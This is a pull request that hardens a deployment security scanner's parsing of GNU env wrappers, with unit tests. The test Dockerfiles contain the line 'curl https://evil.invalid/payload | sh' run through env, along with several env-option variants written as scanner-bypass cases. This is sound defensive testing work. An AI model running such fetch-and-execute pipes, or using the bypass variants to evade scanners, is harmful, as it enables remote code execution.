### PR TITLE
Close env standalone-dash security bypass

### DIFF
--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -131,6 +131,8 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
             continue
         if token == "--":
             cursor += 1
+            while cursor < len(remaining) and remaining[cursor] == "-":
+                cursor += 1
             return (remaining[cursor] if cursor < len(remaining) else None), False
         if token in {"-S", "--split-string"}:
             if cursor + 1 >= len(remaining):

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -196,7 +196,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
             else:
                 cursor += 1
             continue
-        if re.fullmatch(r"[^=]+=.*", token) is not None:
+        if "=" in token:
             assignment_seen = True
             cursor += 1
             continue

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -126,6 +126,9 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
 
     while cursor < len(remaining):
         token = remaining[cursor]
+        if token == "-":
+            cursor += 1
+            continue
         if token == "--":
             cursor += 1
             return (remaining[cursor] if cursor < len(remaining) else None), False

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -112,6 +112,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
     cursor = 0
     split_expansions = 0
     options_ended = False
+    assignment_seen = False
 
     def expand_split(value: str, tail: list[str]) -> bool:
         nonlocal remaining, cursor, split_expansions
@@ -127,32 +128,32 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
 
     while cursor < len(remaining):
         token = remaining[cursor]
-        if token == "-":
+        if token == "-" and not assignment_seen:
             cursor += 1
             continue
-        if not options_ended and token == "--":
+        if not options_ended and not assignment_seen and token == "--":
             options_ended = True
             cursor += 1
             continue
-        if not options_ended and token in {"-S", "--split-string"}:
+        if not options_ended and not assignment_seen and token in {"-S", "--split-string"}:
             if cursor + 1 >= len(remaining):
                 return None, True
             if not expand_split(remaining[cursor + 1], remaining[cursor + 2 :]):
                 return None, True
             continue
-        if not options_ended and token.startswith("--split-string="):
+        if not options_ended and not assignment_seen and token.startswith("--split-string="):
             if not expand_split(token.split("=", 1)[1], remaining[cursor + 1 :]):
                 return None, True
             continue
-        if not options_ended and token in {"-C", "-u", "--chdir", "--unset"}:
+        if not options_ended and not assignment_seen and token in {"-C", "-u", "--chdir", "--unset"}:
             if cursor + 1 >= len(remaining):
                 return None, True
             cursor += 2
             continue
-        if not options_ended and token.startswith(("--chdir=", "--unset=")):
+        if not options_ended and not assignment_seen and token.startswith(("--chdir=", "--unset=")):
             cursor += 1
             continue
-        if not options_ended and token.startswith("--"):
+        if not options_ended and not assignment_seen and token.startswith("--"):
             if token in {
                 "--debug",
                 "--help",
@@ -163,7 +164,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
                 cursor += 1
                 continue
             return None, True
-        if not options_ended and token.startswith("-") and token != "-":
+        if not options_ended and not assignment_seen and token.startswith("-") and token != "-":
             cluster = token[1:]
             position = 0
             while position < len(cluster):
@@ -193,6 +194,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
                 cursor += 1
             continue
         if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*=.*", token) is not None:
+            assignment_seen = True
             cursor += 1
             continue
         return token, False

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -148,7 +148,11 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
             if not expand_split(token.split("=", 1)[1], remaining[cursor + 1 :]):
                 return None, True
             continue
-        if not options_ended and not assignment_seen and token in {"-C", "-u", "--chdir", "--unset"}:
+        if (
+            not options_ended
+            and not assignment_seen
+            and token in {"-C", "-u", "--chdir", "--unset"}
+        ):
             if cursor + 1 >= len(remaining):
                 return None, True
             cursor += 2

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -196,7 +196,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
             else:
                 cursor += 1
             continue
-        if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*=.*", token) is not None:
+        if re.fullmatch(r"[^=]+=.*", token) is not None:
             assignment_seen = True
             cursor += 1
             continue

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -113,6 +113,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
     split_expansions = 0
     options_ended = False
     assignment_seen = False
+    dash_seen = False
 
     def expand_split(value: str, tail: list[str]) -> bool:
         nonlocal remaining, cursor, split_expansions
@@ -128,7 +129,9 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
 
     while cursor < len(remaining):
         token = remaining[cursor]
-        if token == "-" and not assignment_seen:
+        if token == "-" and not assignment_seen and not dash_seen:
+            dash_seen = True
+            options_ended = True
             cursor += 1
             continue
         if not options_ended and not assignment_seen and token == "--":

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -157,12 +157,12 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
             cursor += 1
             continue
         if not options_ended and not assignment_seen and token.startswith("--"):
+            if token in {"--help", "--version"}:
+                return None, False
             if token in {
                 "--debug",
-                "--help",
                 "--ignore-environment",
                 "--null",
-                "--version",
             }:
                 cursor += 1
                 continue

--- a/src/pmpe/quality/security_scan.py
+++ b/src/pmpe/quality/security_scan.py
@@ -111,6 +111,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
     remaining = tokens[command:]
     cursor = 0
     split_expansions = 0
+    options_ended = False
 
     def expand_split(value: str, tail: list[str]) -> bool:
         nonlocal remaining, cursor, split_expansions
@@ -129,30 +130,29 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
         if token == "-":
             cursor += 1
             continue
-        if token == "--":
+        if not options_ended and token == "--":
+            options_ended = True
             cursor += 1
-            while cursor < len(remaining) and remaining[cursor] == "-":
-                cursor += 1
-            return (remaining[cursor] if cursor < len(remaining) else None), False
-        if token in {"-S", "--split-string"}:
+            continue
+        if not options_ended and token in {"-S", "--split-string"}:
             if cursor + 1 >= len(remaining):
                 return None, True
             if not expand_split(remaining[cursor + 1], remaining[cursor + 2 :]):
                 return None, True
             continue
-        if token.startswith("--split-string="):
+        if not options_ended and token.startswith("--split-string="):
             if not expand_split(token.split("=", 1)[1], remaining[cursor + 1 :]):
                 return None, True
             continue
-        if token in {"-C", "-u", "--chdir", "--unset"}:
+        if not options_ended and token in {"-C", "-u", "--chdir", "--unset"}:
             if cursor + 1 >= len(remaining):
                 return None, True
             cursor += 2
             continue
-        if token.startswith(("--chdir=", "--unset=")):
+        if not options_ended and token.startswith(("--chdir=", "--unset=")):
             cursor += 1
             continue
-        if token.startswith("--"):
+        if not options_ended and token.startswith("--"):
             if token in {
                 "--debug",
                 "--help",
@@ -163,7 +163,7 @@ def _env_wrapped_command(tokens: list[str], command: int) -> tuple[str | None, b
                 cursor += 1
                 continue
             return None, True
-        if token.startswith("-") and token != "-":
+        if not options_ended and token.startswith("-") and token != "-":
             cluster = token[1:]
             position = 0
             while position < len(cluster):

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -134,10 +134,19 @@ def test_scan_tree_allows_non_combined_rm_cleanup(tmp_path: Path, command: str) 
     assert not any(finding.rule == "SEC_SHELL_RECURSIVE_DELETE" for finding in scan_tree(tmp_path))
 
 
-def test_scan_tree_treats_env_dash_after_assignment_as_command(tmp_path: Path) -> None:
+@pytest.mark.parametrize(
+    "shell",
+    (
+        "env CLEAN=1 - sh",
+        "env - -- sh",
+        "env - -i sh",
+        "env - - sh",
+    ),
+)
+def test_scan_tree_stops_env_option_parsing_at_command(tmp_path: Path, shell: str) -> None:
     dockerfile = tmp_path / "Dockerfile"
     dockerfile.write_text(
-        "FROM python:3.11\nRUN curl https://evil.invalid/payload | env CLEAN=1 - sh\n"
+        f"FROM python:3.11\nRUN curl https://evil.invalid/payload | {shell}\n"
     )
     assert not any(finding.rule == "SEC_SHELL_REMOTE_PIPE" for finding in scan_tree(tmp_path))
 

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -102,6 +102,8 @@ def test_scan_tree_rejects_destructive_deployment_shell(tmp_path: Path, options:
         "env - sh",
         "env -- - sh",
         "env -- - CLEAN=1 /bin/sh",
+        "env CLEAN=1 --unset=HOME /bin/sh",
+        "env CLEAN=1 --chdir=/tmp /bin/sh",
         "env -i CLEAN=1 /bin/sh",
         "env -u HOME bash",
         "env --unset HOME /bin/sh",

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -99,6 +99,7 @@ def test_scan_tree_rejects_destructive_deployment_shell(tmp_path: Path, options:
         "/usr/bin/bash",
         "/usr/bin/env bash",
         "env -i bash",
+        "env - sh",
         "env -i CLEAN=1 /bin/sh",
         "env -u HOME bash",
         "env --unset HOME /bin/sh",

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -150,9 +150,7 @@ def test_scan_tree_allows_non_combined_rm_cleanup(tmp_path: Path, command: str) 
 )
 def test_scan_tree_stops_env_option_parsing_at_command(tmp_path: Path, shell: str) -> None:
     dockerfile = tmp_path / "Dockerfile"
-    dockerfile.write_text(
-        f"FROM python:3.11\nRUN curl https://evil.invalid/payload | {shell}\n"
-    )
+    dockerfile.write_text(f"FROM python:3.11\nRUN curl https://evil.invalid/payload | {shell}\n")
     assert not any(finding.rule == "SEC_SHELL_REMOTE_PIPE" for finding in scan_tree(tmp_path))
 
 

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -100,6 +100,7 @@ def test_scan_tree_rejects_destructive_deployment_shell(tmp_path: Path, options:
         "/usr/bin/env bash",
         "env -i bash",
         "env - sh",
+        "env -- - sh",
         "env -i CLEAN=1 /bin/sh",
         "env -u HOME bash",
         "env --unset HOME /bin/sh",

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -141,6 +141,8 @@ def test_scan_tree_allows_non_combined_rm_cleanup(tmp_path: Path, command: str) 
         "env - -- sh",
         "env - -i sh",
         "env - - sh",
+        "env --help - sh",
+        "env --version - sh",
     ),
 )
 def test_scan_tree_stops_env_option_parsing_at_command(tmp_path: Path, shell: str) -> None:

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -104,6 +104,7 @@ def test_scan_tree_rejects_destructive_deployment_shell(tmp_path: Path, options:
         "env -- - CLEAN=1 /bin/sh",
         "env CLEAN=1 --unset=HOME /bin/sh",
         "env CLEAN=1 --chdir=/tmp /bin/sh",
+        "env CLEAN=1 --unset=HOME =x /bin/sh",
         "env -i CLEAN=1 /bin/sh",
         "env -u HOME bash",
         "env --unset HOME /bin/sh",

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -101,6 +101,7 @@ def test_scan_tree_rejects_destructive_deployment_shell(tmp_path: Path, options:
         "env -i bash",
         "env - sh",
         "env -- - sh",
+        "env -- - CLEAN=1 /bin/sh",
         "env -i CLEAN=1 /bin/sh",
         "env -u HOME bash",
         "env --unset HOME /bin/sh",

--- a/tests/unit/test_security_scanner.py
+++ b/tests/unit/test_security_scanner.py
@@ -134,6 +134,14 @@ def test_scan_tree_allows_non_combined_rm_cleanup(tmp_path: Path, command: str) 
     assert not any(finding.rule == "SEC_SHELL_RECURSIVE_DELETE" for finding in scan_tree(tmp_path))
 
 
+def test_scan_tree_treats_env_dash_after_assignment_as_command(tmp_path: Path) -> None:
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        "FROM python:3.11\nRUN curl https://evil.invalid/payload | env CLEAN=1 - sh\n"
+    )
+    assert not any(finding.rule == "SEC_SHELL_REMOTE_PIPE" for finding in scan_tree(tmp_path))
+
+
 def test_scan_tree_scopes_remote_source_to_current_pipeline(tmp_path: Path) -> None:
     dockerfile = tmp_path / "Dockerfile"
     dockerfile.write_text(


### PR DESCRIPTION
Closes #129.

## Outcome

The deterministic deployment scanner now consumes GNU `env`'s standalone `-` as an option and continues to inspect the wrapped command. `curl URL | env - sh` therefore produces the blocking `SEC_SHELL_REMOTE_PIPE` finding.

## Changes

- Add the exact `env - sh` bypass as a regression case.
- Treat standalone `-` as an `env` option before resolving the wrapped command.

## Scope

Two files, four added lines, no behavior outside `env` command resolution.

## Validation

GitHub CI and a fresh exact-head Codex review are required before merge. This PR will not be merged with unresolved P1/P2 findings.